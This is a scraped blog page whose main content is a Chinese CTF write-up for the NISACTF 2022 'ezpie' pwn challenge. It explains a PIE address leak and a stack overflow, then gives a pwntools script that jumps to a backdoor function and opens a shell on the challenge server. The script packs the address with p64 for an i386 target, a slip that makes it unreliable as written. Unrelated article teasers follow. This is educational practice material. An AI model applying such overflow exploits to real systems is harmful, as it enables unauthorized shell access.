news 2026/8/21 4:32:31

[NISACTF 2022]ezpie

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[NISACTF 2022]ezpie

第一次打CTF——PWN篇学习笔记14

这道题开启了PIE保护,但程序中直接泄露了main函数的随机地址,因此我们可以进行直接计算

int __cdecl main(int argc, const char **argv, const char **envp) { setbuf(stdin, 0); setbuf(stdout, 0); puts("OHHH!,give you a gift!"); printf("%p\n", main); puts("Input:"); vuln(); return 0; } ssize_t vuln() { _BYTE buf[40]; // [esp+0h] [ebp-28h] BYREF ​ return read(0, buf, 0x50u); } ssize_t vuln() { _BYTE buf[40]; // [esp+0h] [ebp-28h] BYREF ​ return read(0, buf, 0x50u); }

又发现栈溢出和后门函数,且main函数地址为0x770,shell函数地址为0x80F,据此编写脚本,即可得到flag

from pwn import * import struct ​ context.arch = 'i386' context.os = 'linux' ​ #io = process('./pwn') io = remote("node5.anna.nssctf.cn",23609) ​ io.recvuntil(b"OHHH!,give you a gift!\n") ​ main = int(io.recvline().strip(), 16) ​ backdoor = main - 0x770 + 0x80F ​ payload = cyclic(0x28 + 4) + p64(backdoor) ​ io.sendline(payload) ​ io.interactive()
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/8/21 22:52:13

辛格迪丨GMP标准时钟同步管理指南:以数据完整性为核心的合规实践

在医药行业数据完整性监管持续收紧的背景下,标准时钟作为GMP数据时间戳的统一基准,直接决定了药品生产、检验、合规审计的准确性与可追溯性。此前已明确GMP时钟的管控范围与管理原则,本文结合辛格迪在生命健康领域的翱泰数字化平台合规实践、…

作者头像 李华
网站建设 2026/8/21 23:35:24

iMetaOmics主编于君教授成首位同年度揽获CellPress三项大奖学者

点击蓝字 关注我们创纪录!于君教授成首位同年度揽获Cell Press三项大奖学者创纪录!于君教授成首位同年度揽获Cell Press三项大奖学者💐恭喜港中大于君教授获国际顶尖学术期刊出版社细胞出版社(Cell Press)颁发三项大奖…

作者头像 李华
网站建设 2026/8/21 14:22:37

解决FaceFusion报错:No source face detected

解决 FaceFusion 报错 “No source face detected” 在使用 facefusion 或其衍生工具进行换脸处理时,你是否曾遇到过这样的尴尬:源图像清晰可见人脸,目标视频也正对镜头,但程序却突然报错: Error: No source face de…

作者头像 李华
网站建设 2026/8/21 23:35:56

用LangChain定制Anything-LLM的AI回复风格

让AI“好好说话”:用LangChain重塑Anything-LLM的表达人格 在一次内部知识系统评审会上,技术主管指着屏幕上的一段AI回复皱起了眉头:“它说‘可能涉及权限问题’——到底是还是不是?有没有依据?” 团队沉默了。我们花了…

作者头像 李华